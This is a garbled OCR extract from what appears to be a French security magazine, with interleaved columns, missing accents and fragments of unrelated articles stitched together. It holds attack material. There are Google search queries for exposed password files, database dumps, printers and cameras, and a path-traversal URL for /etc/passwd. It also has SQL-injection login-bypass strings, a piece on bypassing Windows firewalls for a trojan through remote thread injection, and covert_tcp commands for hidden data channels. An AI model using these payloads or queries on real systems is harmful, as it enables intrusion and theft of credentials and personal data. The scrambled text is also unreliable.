l'utilisateur dmarrant un naviga- donnes SQL permettant d'ajouter champ username vide et de taper
teur Web. Il suffit donc que l'intrus des messages laisss par les visi- dans le champ password ') OR ('a'
tape dans le systme vulnrable teurs au livre d'or du site visit. En = 'a ou l'inverse laisser le champ
l'adresse /index.php3?action=tele- avril 2004, l'information concernant password vide et taper ? or 1=1
charger&fichier=/etc/passwd pour un trou de scurit dans la version dans le champ username. Pour
qu'il obtienne le contenu du fichier 2.2 de ce logiciel permettant (grce trouver sur le rseau les sites vuln-
Informations sur
les rseaux et les
systmes
Presque chaque attaque contre un
systme informatique est prcde
de son tude. En rgle gnrale,
cela consiste scanner les ordina-
teurs c'est un essai ayant pour but
de dfinir les services en marche, un
type de systme d'exploitation uti-
lis et la version du logiciel utilitaire.
Figure 4. Advanced Guestbook page d'ouverture de session
Pour cela, on utilise le plus souvent
les scanners de type Nmap ou amap
mais il existe encore une option
choisir. Plusieurs administrateurs
installent des applications Web
gnrant sans arrt les statistiques
de travail du systme, informant sur
l'encombrement des disques durs et
contenant les listes des processus
dmarrs et mme les journaux
systme.
Pour un intrus, ce sont des in-
formations trs prcieuses. Il suffit
qu'il demande Google de trouver
les statistiques du logiciel phpSys-
tem : "Generated by phpSystem"
et il obtiendra des pages similaires
Focus
Question Rsultat
"A syntax error has occur- les messages d'erreur de la base Informix ils peuvent contenir les noms des
red" filetype:ihtml fonctions ou de fichiers, des informations sur la rpartition des fichiers, des frag-
ments du code SQL et des mots de passe
"Access denied for user" les erreurs d'authentification ils peuvent contenir des noms d'utilisateur, des
"Using password" noms des fonctions, des informations sur la rpartition de fichiers et de fragments
de code SQL
"The script whose uid is " les messages d'erreur PHP lis au contrle d'accs ils peuvent contenir des noms
"is not allowed to access" de fichiers ou de fonctions et des informations sur la rpartition des fichiers
"ORA-00921: unexpected end of les messages d'erreur de la base Oracle ils peuvent contenir des noms de
SQL command" fichiers ou de fonctions et des informations sur la rpartition des fichiers
"error found handling the les messages d'erreur du logiciel Cocoon ils peuvent contenir le numro de la
request" cocoon filetype:xml version Cocoon, des noms de fichiers ou de fonctions et des informations sur la
rpartition des fichiers
"Invision Power Board Data- les messages d'erreur du forum de discussion Invision Power Board ils peuvent
base Error" contenir des noms de fonctions et de fichiers, des informations sur la rpartition
de fichiers dans le systme et des fragments du code SQL
"Warning: mysql _ query()" les messages d'erreur de la base MySQL ils peuvent contenir des noms d'uti-
"invalid query" lisateur, des noms de fonctions des fichiers et des informations sur la rpartition
des fichiers
"Error Message : Error loa- les messages d'erreur des scripts CGI ils peuvent contenir des informations sur le
ding required libraries." type du systme d'exploitation et la version du logiciel, des noms d'utilisateur, des
noms de fichiers et des informations sur la rpartition de fichiers dans le systme
"#mysql dump" filetype:sql les messages d'erreur de la base MySQL ils peuvent contenir des informations
sur la structure et le contenu de la base de donnes
Question Rsultat
"http://*:*@www" site les mots de passe pour la page site enregistrs comme
http://username:password@www...
filetype:bak inurl:"htaccess|passwd|shadow| les copies de sauvegarde de fichiers pouvant contenir des informa-
htusers" tions sur des noms d'utilisateurs et des mots de passe
filetype:mdb inurl:"account|users|admin|admi les fichiers de type mdb qui peuvent contenir des informations sur
nistrators|passwd|password" les mots de passe
intitle:"Index of" pwd.db les fichiers pwd.db peuvent contenir des noms d'utilisateurs et des
mots de passe crypts
inurl:admin inurl:backup intitle:index.of les rpertoires nomms admin et backup
"Index of/" "Parent Directory" "WS _ les fichiers de configuration du logiciel WS_FTP pouvant contenir
FTP.ini" filetype:ini WS _ FTP PWD des mots de passe pour des serveurs FTP
ext:pwd inurl:(service|authors|administrato des fichiers contenant des mots de passe du logiciel Microsoft
rs|users) "# -FrontPage-" FrontPage
filetype:sql ("passwd values ****" | "pas- des fichiers contenant des codes SQL et des mots de passe ajou-
sword values ****" | "pass values ****" ) ts la base de donnes
intitle:index.of trillian.ini des fichiers de configuration du logiciel de messagerie instantane
Trillian
eggdrop filetype:user user des fichiers de configuration de lircbot Eggdrop
filetype:conf slapd.conf des fichiers de configuration de l'application OpenLDAP
inurl:"wvdial.conf" intext:"password" des fichiers de configuration du logiciel WV Dial
ext:ini eudora.ini des fichiers de configuration du logiciel de messagerie lectronique
Eudora
filetype:mdb inurl:users.mdb des fichiers Microsoft Access pouvant contenir des informations sur
des comptes
intext:"powered by Web Wiz Journal" des services Web utilisant l'application Web Wiz Journal permettant
dans la configuration standard de tlcharger un fichier contenant
les mots de passe ; au lieu de l'adresse par dfaut http://<host>/
journal/, il faut taper http://<host>/journal/journal.mdb
"Powered by DUclassified" -site:duware.com des services Web utilisant les applications DUclassified, DUcalen-
"Powered by DUcalendar" -site:duware.com dar, DUdirectory, DUclassmate, DUdownload, DUpaypal, DUforum
"Powered by DUdirectory" -site:duware.com ou DUpics qui, dans la configuration standard, permettent de tl-
"Powered by DUclassmate" -site:duware.com charger un fichier contenant les mots de passe ; au lieu de l'adres-
"Powered by DUdownload" -site:duware.com se par dfaut (pour DUclassified) http://<host>/duClassified/, il faut
"Powered by DUpaypal" -site:duware.com taper http://<host>/duClassified/_private/duclassified.mdb
Focus
Question Rsultat
filetype:xls inurl:"email.xls" des fichiers email.xls pouvant contenir des adresses
Question Priphrique
"Copyright (c) Tektronix, Inc." "printer status" les imprimantes PhaserLink
inurl:"printer/main.html" intext:"settings" les imprimantes Brother HL
intitle:"Dell Laser Printer" ews les imprimantes Della bases sur la technologie EWS
intext:centreware inurl:status les imprimantes Xerox Phaser 4500/6250/8200/8400
inurl:hp/device/this.LCDispatcher les imprimantes HP
intitle:liveapplet inurl:LvAppl les camras Canon Webview
intitle:"EvoCam" inurl:"webcam.html" les camras Evocam
inurl:"ViewerFrame?Mode=" les camras Panasonic Network Camera
(intext:"MOBOTIX M1" | intext:"MOBOTIX M10") intext: les camras Mobotix
"Open Menu" Shift-Reload
Donnes personnelles des utilisateurs. Malheureusement, votre Curriculum Vitae envoy pour
Focus
et documents il arrive que les diffrents docu- la recherche d'un emploi pour qu'il
ments confidentiels contenant connaisse votre adresse, votre nu-
confidentiels vos donnes soient mis dans des mro de tlphone, votre date de
Aussi bien que dans les pays fai- endroits accessibles au grand pu- naissance, votre niveau d'tude,
sant parti de l'Union Europenne blic ou envoys via le rseau sans vos centres d'intrts et votre exp-
qu'aux tats-Unis, il existe des tre pour autant scuriss. Il suffit rience professionnelle.
rgulations juridiques ayant pour donc que l'intrus obtienne l'accs Sur le rseau, il y a plein de
but de protger la confidentialit au courrier lectronique contenant documents de ce type. Pour les
Priphriques rseaux
Plusieurs administrateurs ne pren-
nent pas au srieux la scurit
des priphriques tels que les im-
primantes rseaux ou les camras
Web. Pourtant, une imprimante mal
scurise peut devenir la premire
cible attaquer par l'intrus qu'il
Figure 13. Page de configuration de l'imprimante HP trouve par Google utilisera ensuite pour raliser des
attaques contre d'autres systmes
trouver, il faut poser la question sui- notamment si celles-ci concernent sur le rseau. Les camras Inter-
vante : intitle:"curriculum vitae" les contacts dans le cadre d'une so- net ne sont pas trs dangereuses
"phone * * *" "address *" "e-mail". cit. Dans ce cas, il est conseill et peuvent tre considres comme
Il est galement facile de trouver de taper la question : filetype:xls un divertissement mais il n'est pas
des adresses sous forme de listes inurl:"email.xls" permettant de difficile d'imaginer la situation o
de noms, de numros de tlphones trouver des feuilles de calcul nom- les donnes de ce type auraient
et d'adresses e-mail (Figure 11). mes email.xls. de l'importance (une espiglerie
Cela rsulte du fait que presque La mme situation concerne les industrielle, un vol main arme).
tous les utilisateurs d'Internet logiciels de messagerie instantane Les questions sur les imprimantes
crent diffrents types de carnets et les listes de contacts enregistres. et les camras se trouvent dans le
d'adresses lectroniques ceux-ci Quand une liste de ce type tombe Tableau 8 et la Figure 13 reprsente
sont peu importants pour un intrus entre les mains d'un intrus, celui-ci la page de configuration de l'impri-
moyen mais un manipulateur habile pourra essayer de se faire passer mante trouve sur le rseau. n
(social engineering) sera capable pour vos amis. Ce qui est intres-
d'utiliser au mieux ces donnes, sant, c'est qu'un grand nombre de
S
upposons que vous ayez dvelopp tant puisse faire la diffrence entre ce que
un cheval de Troie ou un logiciel de notre programme et le programme autoris
ce genre. Malheureusement, vos vic- font (le tout en notre faveur). Bien qu' priori
times utilisent un pare-feu cens bloquer les difficile, ce procd est relativement ais.
tentatives de connexion et mme dcouvrir Tout ce dont nous avons besoin est fourni par
l'existence de cet outil (voir la Figure 1). Il vous l'API de Windows.
faut, d'une manire ou d'une autre, percer ce
systme de scurit. Programmation d'un
Un pare-feu performant possde en g- contournement
nral une fonction charge de sauvegarder Afin de contourner discrtement un pare-feu,
les rgles de scurit de sorte que l'utilisateur il vous suffit de regrouper les fonctions de votre
n'ait pas tre inform chaque tentative de
connexion des outils obligs d'tablir des con-
nexions trs souvent comme les navigateurs, Cet article explique...
les clients email, les filtres antispam, les mes-
comment contourner les pare-feux personnels
sageries instantanes, etc. L'utilisateur accorde
sous Windows,
ces permissions lorsqu'il pense que ce logiciel comment joindre des fils d'excution externes
est confidentiel et lorsqu'il sait qu'il va l'utiliser aux processus.
trs souvent.
Pratique
propos de l'auteur
Diplm d'informatique, Mark Hamil-
ton travaille comme consultant ind-
pendant en scurit pour le compte
de PME ainsi que de particuliers.
En plus de la neuroinformatique
et du grid computing, la scurit des
applications Web et des rseaux re-
prsentent les principaux domaines
de son activit. Le prsent article est
sa premire publication.
LPVOID RemoteFileName;
TCHAR ModuleFileName[MAX_PATH];
LPVOID RemoteFileName,
LPTSTR FileName; TCHAR ModuleFileName[MAX _ PATH],
HANDLE hRemoteThread; LPTSTR FileName,
HINSTANCE RemoteModule; HANDLE hRemoteThread,
hProcessSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
HINSTANCE RemoteModule.
if( hProcessSnap == INVALID_HANDLE_VALUE )
{
Suite sur la page suivante
La variable intitule RemoteFileName
est ncessaire pour attribuer de
la mmoire RAM, et les variables
Sur Internet
http://www.msdn.microsoft.com The Microsoft Developer Network,
http://www.winapi.org le site consacr la programmation sous Windows.
V
otre serveur a t victime d'un pira- les donnes partir de diffrents types de sys-
tage. L'intrus tait si malicieux qu'il a tmes de fichiers.
supprim plusieurs fichiers importants
sur votre disque dur, y compris le programme Prparation de la partition
que vous labor depuis plusieurs mois. Avant la rcupration des donnes
de rinstaller le systme (afin d'liminer du Indpendamment du systme de fichiers par-
code malin laiss par l'intrus), il serait bien de tir duquel vous voulez rcuprer vos donnes,
rcuprer les donnes. Pour cela, vous pourrez il faut dmonter la partition sur laquelle vous
utiliser les outils disponibles dans chaque dis- travaillerez. Pour tre au moins un petit peu sr
tribution Linux. que les donnes n'ont pas t endommages,
il faut excuter cette tape juste aprs la sup-
Outils ncessaires pression des fichiers.
Le premier lment indispensable est un jeu
d'outils permettant de travailler sur les syst-
mes de fichiers ext2 et ext3 il s'agit ici du pa- Cet article explique...
quet e2fsprogs. Pour vous, le plus important est
comment rcuprer les donnes partir des
debugfs, qui comme son nom l'indique sert
systmes de fichiers de type ext2 et ext3,
dboguer le systme de fichiers. Par dfaut
Pratique
du type de fichier un fichier ordiniare, un rpertoire ou un fichier de priphri- La seconde mthode de dmontage
que, d'un systme systme de fichiers
de l'identifiant UID du propritaire, consiste le mettre en mode RO
de la liste de blocs disque et de leurs fragments constituant le fichier. (read only). Ainsi, vos fichiers ne
pourront pas tre remplacs. Pour
L'inode peut tre trait comme un identifiant du fichier sur le disque dur, utilis par le
ce faire, tapez la commande sui-
systme pour retrouver le fichier souhait. chaque fichier sur la partition donne,
vante :
un seul inode est affect.
$ dd if=/dev/hda10 \
Figure 2. La structure des blocs dans le systme de fichiers ext2 >~/hda10.backup.img
Consultons le Listing 5. Nos ino- Dmontons donc la partition :
des ont t supprims d'un systme Pour nous faciliter un peu la tche,
de fichiers. La dmarche que nous # umount /dev/hda10 nous pouvons diviser notre partition
avons choisie ne mne nulle part. en parties plus petites. Si la partition
Pourtant, nous pouvons essayer Ensuite, nous devons la monter de a la taille de 1 Go, il est juste de la
Pratique
une certaine astuce vrifier si le nouveau en tant qu'ext2, et cela en partitionner en 10 parties de 100 Mo
systme d'exploitation considrait le mode read only pour les raisons de chacune. Un simple script spciale-
systme de fichier comme ext2. La scurit : ment conu cet effet est prsent
solution est divise en trois tapes : dans le Listing 7 le disque dur peut
# mount -o ro -t ext2 \ tre partitionn l'aide de la com-
dmonter le systme de fichiers, /dev/hda10 /tmp mande suivante :
le monter de nouveau, mais cette
fois-ci en tant qu'ext2, Maintenant, essayons de travailler $ dsksplitter.pl 10 1000000 \
rcuprer les fichiers. avec debugfs de la faon prsente /dev/hda10 ~/dsk.split
$ grep -n -a -1 \
"int main" ~/dsk.split/*
Listing 6. La rcupration des donnes de la partition ext3 monte en
L'option -n affichera le numro de la tant qu'ext2
ligne du fichier dans lequel se trouve debugfs: lsdel
la chane de caractres souhaite. Inode Owner Mode Size Blocks Time deleted
Grce l'option -a, les fichiers binai- (...)
res sont traits comme fichiers texte, 20 0 100644 41370 14/14 Tue Feb 14 19:20:25 2005
(...)
par contre -1 affichera une ligne
24 0 100644 17104 5/5 Tue Feb 15 19:13:26 2005
avant et une ligne aprs la chane 352 deleted inodes found.
retrouve. Bien sr, il est possible de debugfs:
changer la chane int main par une
chane de caractres quelconque.
Nous avons obtenu les rsultats : Listing 7. dsksplitter.pl un script simple servant partitionner les
disques durs
~/dsk.split/dsk.1:40210:
#include <sys/socket.h> #!/usr/bin/perl
if ($ARGV[3] eq "") {
~/dsk.split/dsk.1:40211:
print "Usage:\ndsksplitter.pl <dsk_parts> <part_size in Kb>
int main (int argc, char *argv[])
<partition_to_split> <target_dir>";
~/dsk.split/dsk.1:40212: }
{ (...) else
{
$parts = $ARGV[0];
L'Ext3 enregistre de nouveaux fi-
$size = $ARGV[1];
chiers au dbut du disque dur, nous $partition = $ARGV[2];
pouvons donc supposer que la ligne $tardir = $ARGV[3];
trouve est justement celle que nous for ($i = 1; $i <= $parts; $i++) {
cherchons. Essayons donc encore system "dd bs=1k if=$partition of=$tardir/dks.$i
count=$size skip=$ix$size";
une fois de partitionner le disque dur
}
et y rechercher les donnes :
$ mkdir ~/dsk1.split
$ dsksplitter.pl 10 10000 \ Le rsultat obtenu : Maintenant, nous avons le fichier
~/dsk.split/dsk.1 ~/dsk1.split contenant le programme supprim
~/dsk1.split/dsk.3:143: par un intrus. Bien que le fichier
Excutons maintenant la commande #include <sys/socket.h> dans lequel celui-ci se trouve a 10
grep sur le fichier dsk.1 partitionn : ~/dsk1.split/dsk.3:144: Mo, c'est mieux que d'effectuer la
int main (int argc, char *argv[]) recherche sur 1 Go de donnes.
$ grep -n -a -1 \ ~/dsk1.split/dsk.3:145: Pourtant, si cette prcision ne nous
"int main" ~/dsk1.split/* { (...) suffit pas, nous pouvons tenter de
diviser le fragment intressant du
disque dur en parties encore plus
Sur Internet petites. Si ce fichier sera rduit
une taille qui nous convient,
http://e2fsprogs.sourceforge.net le site du paquet e2fsprogs,
http://web.mit.edu/tytso/www/linux/ext2fs.html le site de l'ext2fs,
il nous reste de lancer un diteur de
http://www.namesys.com le site des auteurs du ReiserFS, texte quelconque et de supprimer
http://oss.software.ibm.com/developerworks/opensource/jfs le site du systme les lignes superflues.
de fichiers jfs, Cette technique prend beau-
http://oss.sgi.com/projects/xfs le site du projet xfs, coup de temps, mais elle est trs
http://www.securiteam.com/tools/6R00T0K06S.html le paquet unrm. efficace. Elle tait teste sur plu-
sieurs distributions de Linux, mais
et les traces des inodes seront corri- heureux hasard. et la bibliothque e2undel crite
ges et restaures. Pour cela, nous Comme cela est prsent sur par Olivier Diedrich fonctionnant
disposons de la commande : la Figure 1, dans les systmes de avec le paquet e2fsprogs. Bien sr,
fichiers avec journalisation, de nou- vous ne devez pas vous attendre
# reiserfsck rebuild-tree -S \ veaux fichiers sont enregistrs au rcuprer 100% de fichiers sup-
-l /home/aqu3l/recovery/log /dev/loop0 dbut du disque dur. Thoriquement, prims (bien que parfois cela soit
notre fichier se trouve juste aprs possible) si vous russissez
Grce l'option -S, il sera possible ce qu'on appelle bloc principal (en sauver environ 80%, on pourra
de vrifier le disque dur entier, et pas anglais root block), c'est--dire, le parler d'un grand succs. n
U
n systme de dtection d'intrusion peut C'est dans le domaine de l'audit que remonte
tre compar une alarme domesti- l'origine des systmes de dtection d'intrusion,
que contre les cambrioleurs si une comme le relate l'ouvrage parfaitement docu-
tentative d'intrusion malveillante est dcou- ment intitul A Guide to Understanding Audit
verte, une rponse de quelque nature qu'elle in Trusted Systems (publi sous la collection
soit sera alors dclenche. Plus de capteurs Rainbow Series du ministre de la Dfense
sont paramtrs, meilleur est le systme, puis- des tats-Unis), et galement connu sous
que chaque capteur est charg de dtecter un le titre de The Tan Book. Les auteurs de cet
type particulier d'activit (telle que l'ouverture ouvrage dfinissent l'audit comme un contrle
des portes ou des fentres, une dtection vo- et une rvision indpendants des activits et des
lumtrique etc.). Toutefois, l'instar de tous les
autres systmes automatiques, un systme de
Cet article explique...
dtection d'intrusion peut prsenter des failles,
mettre de fausses alertes ou tre contourn la nature des systmes de dtection d'intrusion,
par des techniciens hautement qualifis sur ce la faon de contourner les solutions proposes
genre de matriel. par les systmes de dtection d'intrusion,
Le premier systme de dtection d'intrusion la faon de se protger contre les fuites de tels
a vu le jour au dbut des annes 80 ; il s'agissait systmes.
Science
Les solutions de
dtection d'intrusion
Il existe trois approches diffrentes
en matire de dtection d'intrusion.
La premire est le systme de dtec-
tion d'intrusion au niveau du rseau
ou Network Intrusion Detection Sys-
tem (NIDS), largement utilis, charg
d'analyser de manire passive le trafic
rseau, et de chercher les activits
malveillantes. La deuxime approche
est le systme de dtection d'intru-
sion au niveau des htes ou Host
Figure 1. Modle CIDF (Common Intrusion Detection Framework) d'un
Intrusion Detection System (HIDS),
systme de dtection d'intrusion au niveau du rseau
fonctionnant sur un hte surveill pour
enregistrements d'un systme. En r- caine. Dans sa publication scientifi- y dtecter des intrusions. Enfin, la troi-
gle gnrale, l'audit permet de remon- que, il a dcrit comment restreindre sime approche, et la moins utilise,
ter la source des vnements et de le champ des audits uniquement aux est le systme de dtection d'intrusion
dcouvrir des activits illgales. conditions de scurit pertinentes au niveau des nuds du rseau ou
James Anderson fut le premier et comment discerner les activits Network Node Intrusion Detection
dvelopper ces systmes de d- normales des illgales. Plus tard eut System (NNIDS) solution hybride
tection d'intrusion naissants pour lieu la dmonstration publique du regroupant les caractristiques des
le compte de l'arme de l'air amri- Network System Monitor, systme NIDS mentionns plus haut, tout en
n'analysant qu'une partie (ou nud)
du trafic rseau. Les approches de
Snort, fer de lance de la dtection d'intrusion dtection comprennent les tches
Snort est un outil libre dvelopp en 1998 par Martin Roesch de l'quipe Sourcefire. de contrle de l'activit du rseau en
Aujourd'hui, des entreprises, des universits, des agences gouvernementales etc. du
cherchant des modles particuliers
monde entier ont recours cet outil la documentation de Snort est disponible en plus
(ou signatures) afin de raliser une
de 10 langues. La version la plus rcente, sortie en mai 2005 est Snort 2.3.3, tlchar-
analyse statistique sur cette activit
geable partir du site http://www.snort.org.
Snort peut tre configur afin de fonctionner selon trois modes principaux : pour dterminer si les donnes ont
t modifies ou non. La Figure 1
mode sniffeur, permet de mieux comprendre le type
mode enregistreur de paquets de donnes, d'analyse ralise.
mode systme de dtection d'intrusion rseau. Par Common Intrusion Detec-
tion Framework (CIDF), on dsigne
Le dernier mode est de loin le plus complexe et le plus difficile configurer. Ce logiciel
l'ensemble des composants qui
est charg d'analyser le trafic rseau selon des rgles dfinies et de raliser certaines
actions (comme par exemple dclencher une alerte). La page consacre au manuel dfinissent un systme de dtec-
d'utilisation de Snort ainsi que les donnes de sortie de la commande snort -? contien- tion d'intrusion (l'objectif consiste
nent les informations ncessaires pour lancer l'outil en diffrents modes. Par exemple, crer un modle de conception pour
activer le mode systme de dtection d'intrusion rseau revient taper les lments ces systmes). Ces composants
suivants : comprennent la gnration d'vne-
ments, les modules d'analyse, les
# snort dev l ./log \
mcanismes de stockage et mme
h 10.10.10.0/24 c snort.conf
les contre-mesures. La plupart des
o le dernier fichier indiqu reprsente le nom de notre fichier de rgles. Chaque paquet systmes de dtection d'intrusion
de donnes sera ainsi contrl afin d'y trouver une rgle correspondante ; si tel est le se contentent de chercher des si-
cas, une action est alors dclenche. gnes d'attaques connues, appels
Quelques exemples de signatures sont exposs dans le Tableau 1. signatures, comme par exemple les
dfinitions antivirus. La principale
propos de l'auteur
Antonio Merola travaille en tant qu'ex-
pert confirm de la scurit chez
Telecom Italia. Au cours de sa car-
rire professionnelle, il a t confront
de nombreux aspects de la scurit.
Son statut d'indpendant lui permet
de prodiguer ses services plusieurs
socits en tant que consultant et ins-
Science
S
tganographie : (en grec steganos de
Stgo, Stgein couvert, serr, dissi- Cet article explique...
mul ; en franais graphie, suffixe tir
du grec : Graph criture, exprimant l'ide de comment dissimuler des donnes dans les en-
ttes TCP et IGMP,
dessin, signes : org. grec Graphein graver,
comment utiliser l'application covert_tcp dans
crire, dessiner). Traduit du grec, ce terme
le domaine de la communication en rseau.
signifie une criture dissimule/cache, avec
la notion de sous couvert de, en tant compris
l'intrieur de. Les dbuts de la stganographie
Ce qu'il faut savoir...
remontent en fait l'Antiquit o dja les Anciens connatre le modle ISO/OSI qui relve de l'Ar-
tentaient de mettre des informations l'abri du chitecture des Rseaux,
regard des autres. On crivait, par exemple, les avoir au moins une connaissance de base de la
messages sur du bois qui tait ensuite recouvert famille de protocoles TCP/IP.
de cire sombre empchant ainsi la lecture par
opacit. En stganographie, on tente en plus,
de masquer la volont mme, de communiquer ;
ce qui la distingue de la cryptographie classique, propos de l'auteur
ukasz Wjcicki poursuit ses tudes doctorales
o l'on encrypte l'information de tel sorte, qu'elle
Science
TCP
Drapeaux des paquets TCP
Le protocole couche de transport URG (urgent) indicateur du mode urgent. Il informe si l'expditeur a pass en
TCP (voir lEncadr Couches du mode urgent du protocole TCP. Cela a lieu lorsque quelque chose d'important se
protocole TCP/IP) a t conu pour produit un bout de la connexion et lorsqu'il faut en informer le plus vite possible
crer des connexions infaillibles en- l'autre partie.
tre les priphriques rseau dans ACK (acknowledgement) signifie qu'un participant de la connexion envoie un
un environnement rseau compos. accus de rception (en anglais acknowledgment) pour confirmer la rception d'un
Pour voir l'en-tte du protocole TCP, paquet de donnes.
PSH (push) si ce drapeau est dfini, le module de rception TCP doit transmettre
reportez-vous la Figure 3.
les donnes l'application le plus vite possible (mthode push).
L'en-tte du paquet TCP comprend
RST (reset) signifie la mise zro de la connexion.
un champ Drapeaux de 6 bits. Les bits SYN (sync) signifie un segment de donnes comprenant un numro de squen-
en question (voir l'Encadr Drapeaux ce initial qu'un participant va envoyer via cette connexion.
des paquets TCP) dfinissent la FIN (finish) signifie qu'un segment donn finit l'envoi des donnes.
destination et le contenu du segment
TCP. la base de leur contenu, un
nud rseau sait comment interpr-
ter les autres champs dans l'en-tte. Couches du protocole TCP/IP
Il existe 64 diffrentes combinaisons Couche d'interface rseau reoit les datagrammes IP et les envoie via un rseau
des paramtres pour les bits donns donn.
certaines sont redondantes, ce qui Couche d'inter rseau elle est responsable de la communication entre les machi-
permet de crer les canaux cachs. nes. Elle reoit les paquets de la couche de transport avec les informations ayant
La plupart des segments TCP pour but d'identifier le destinataire, elle encapsule le paquet dans le datagramme IP,
possdent le bit ACK positionn elle remplit son en-tte, elle vrifie si le datagramme doit tre envoy directement
(la valeur du bit ACK est gale au destinataire ou au routeur et elle transmet le datagramme une interface r-
1) cela rsulte du fait que la seau.
Couche de transport sa tche principale est d'assurer la communication entre
connexion TCP est ralise dans les
Science
les logiciels d'utilisateur. Cette couche peut rgler le transfert des informations.
deux sens ; c'est--dire en mode de
Elle peut galement assurer son infaillibilit. Pour cela, elle organise l'envoi d'un
fonctionnement bidirectionnel simul-
accus de rception par le destinataire et le nouvel envoi des paquets perdus par
tan (en anglais full duplex). l'expditeur.
La combinaison redondante Couche de logiciels utilitaires un niveau suprieur, les utilisateurs appellent
des bits tmoins peut se prsenter les logiciels utilitaires ayant l'accs aux services TCP/IP. Les logiciels utilitaires
comme celle sur la Figure 4. Son in- cooprent avec l'un des protocoles de communication au niveau de la couche de
terprtation est la suivante : un parti- transport et ils envoient ou reoivent les donnes sous la forme des messages ou
cipant de la connexion envisage de du flux d'octets.
mettre fin l'change des donnes
IGMP
La diffusion multiple (en anglais
multicasting) consiste envoyer les
donnes seulement un groupe
donn des priphriques rseau.
Les routeurs et les htes supportant
Figure 5. Structure du datagramme IP la diffusion multiple doivent utiliser le
protocole IGMP pour changer les
informations au sujet de l'apparte-
nance des htes donns un groupe
spcifi de ce type de diffusion.
Dans le protocole IGMP, il existe
deux types de messages :
le rapport d'appartenance un
groupe donn (en anglais host
membership report) et le mes-
sage informant sur la sortie du
groupe (en anglais leave group
message) ; les messages sont
Science
il est possible de distinguer les types Une mthode de ce type est utilise cachs (les champs redondants sont
de datagrammes IP suivants : par l'application covert_tcp cre par souvent filtrs par les priphriques
Craig H. Rowland. Aprs avoir mo- rseau adquats).
de l'hte au routeur avec la frag- difi le code, l'application peut servir L'application en question uti-
mentation autorise, galement cacher les informations lise les champs obligatoires suivants
de l'hte au routeur la fragmen- dans les champs redondants prsents dans l'en-tte du protocole TCP/IP :
tation est interdite, dans les en-ttes des protocoles. co-
du routeur l'hte avec la frag- vert_tcp n'utilise pas la dernire possi- le champ Identification dans
mentation autorise, bilit tant donn qu'il est facile de se le datagramme IP c'est un
du routeur l'hte la fragmenta- protger contre ce type de messages champ unique utilis dans le
tion est interdite.
Manipuler le champ
Identification dans le
datagramme IP
Cette mthode consiste remplacer
la valeur originale par la valeur ASCII
d'un caractre donn. Si l'une des
parties veut faire passer un message
donn via le port 80, par exemple
elle doit dmarrer le logiciel en ta-
pant la commande suivante :
$ covert_tcp \
-source <IP de l'expditeur> \
-server \
-file <fichier avec les donnes
enregistrer>
port 80 ouvert (le rsultat du scanner le client doit confirmer la rcep- valeur ASCII d'un caractre qui
Nmap affichant les ports ouverts est tion du segment SYN en prove- vous intresse. Si l'une des parties
prsent sur la Figure 11). nance du serveur. veut faire passer un certain mes-
Il peut alors taper (Figure 12) la sage du port source 20 au port
commande suivante sur un ordina- Dans ce cas, il est galement pos- destination 20, par exemple elle
teur de socit : sible de remplacer la valeur origi- doit dmarrer l'application via la
nale du numro des donnes par la commande suivante :
$ covert_tcp \
-dest 194.29.169.135 \
-dest_port 80 \
-seq -file code.c
$ covert_tcp \
-source_port 80 \
-server -seq \
-file resultat.txt
C
ontrairement au concentrateur (hub), nous allons commencer par un exemple plus
le commutateur (switch) transfre simple, c'est--dire MAC-flooding.
les trames seulement entre les ports
appropris ceux auxquels sont connects Attention inondation !
respectivement l'expditeur et le destinataire MAC-Flooding consiste inonder le rseau
du message. Les dcisions concernant l'envoi par des trames avec des fausses adresses. En
du message arrivant vers les ports appropris gnral, ces trames sont envoyes par l'intrus
sont prises partir de la table d'adresses une adresse de diffusion ou une adresse qui
matrielles stocke dans la mmoire du com- n'existe pas dans le rseau. Ces trames par-
mutateur lies aux numros de ses ports. viendront notre carte dans les deux cas que
Le commutateur pendant son fonctionnement l'attaque soit russie ou non (si l'assaillant les
apprend ( partir de l'adresse de l'expditeur adresse notre voisin, elles ne parviendront
se trouvant dans les trames qui y parviennent) notre machine qu'au cas o l'attaque sur le
les adresses matrielles des priphriques commutateur a russi). Alors, si les trames
Fiche technique
Figure 2. Le rsultat de l'analyse du programme AntyMACflooding notre rseau, mais nous n'avons pas
de temps pour vrifier si l'une d'elles
sur la Figure 2) environ la moiti et envoient des trames inconnues n'a pas chang (le programme sous
des trames interceptes ont t en- ne pouvant pas tre identifies par Linux arpwatch ou un systme de
voyes partir d'adresses physiques notre programme. Mais c'est un outil dtection des intrus appropri peu-
MAC inconnues. pour les administrateurs qui, quand vent le faire pour nous). L'unique
Bien sr, il peut arriver que
pendant l'coute, de nouveaux or-
dinateurs se sont joints au rseau, Sur Internet
ou bien il existe des machines uti-
lisant une autre pile de protocoles http://www.kis.p.lodz.pl/~mszmit/zasoby.html le paquet d'outils pour le sniffing,
http://winpcap.polito.it/install/default.htm la bibliothque WinPcap.
par exemple IPX/SPX, qui n'ont
pas rpondu aux requtes ARP
hw_address
Vous pouvez en quelques minutes et en toute scurit vous abonner votre magazine prfr.
Nous vous garantissons :
des tarifs prfrentiels,
un paiement en ligne scuris,
la prise en compte rapide de votre commande.
Abonnement en ligne scuris tous les magazines de la maison ddition Software !
bulletin dabonnement
Merci de remplir ce bon de commande et de nous le retourner par fax : 0048 22 860 17 71 ou par courrier :
Software-Wydawnictwo Sp. z o.o., Lewartowskiego 6, 00-190 Varsovie, Pologne ; Tl. 0048 22 860 17 68 ;
E-mail : abonnement@software.com.pl
Adresse .................................................................................................................................................................................................................................
Nombre de Nombre
Titre
partir du
numros dabonne- Prix
numro
annuels ments
Software Developers Journal (1 CD)
anciennement Software 2.0 12 54
Mensuel pour les programmeurs professionnels
Software Developers Journal Extra! (1 CD)
anciennement Software 2.0 Extra! 6 38
Hors-srie du magazine Software Developers Journal
Linux+DVD (2 DVDs) 12 86
Mensuel unique avec 2 DVDs consacr Linux et ses utilisateurs
.PSD (2 CDs) 6 39
Bimestriel pour les utilisateurs dAdobe Photoshop
Total
Je rgle par :
Carte bancaire n CB expire le date et signature obligatoires
type de carte .......................................................................... code CVC/CVV
Virement bancaire :
Nom banque : Socit Gnrale Chasse/Rhne
banque guichet numro de compte cl Rib
30003 01353 00028010183 90
IBAN : FR76 30003 01353 00028010183 90
Adresse Swift (Code BIC) : SOGEFRPP
Tor
Systme : Windows, MacOS X, *NIX
Licence : Base sur la licence BSD
But : Proxy SOCKS anonyme
Fiche technique
Page d'accueil : http://tor.eff.org/
MacOS X scurit
du kernel
Malgr la participation modeste du
systme dexploitation MacOS X
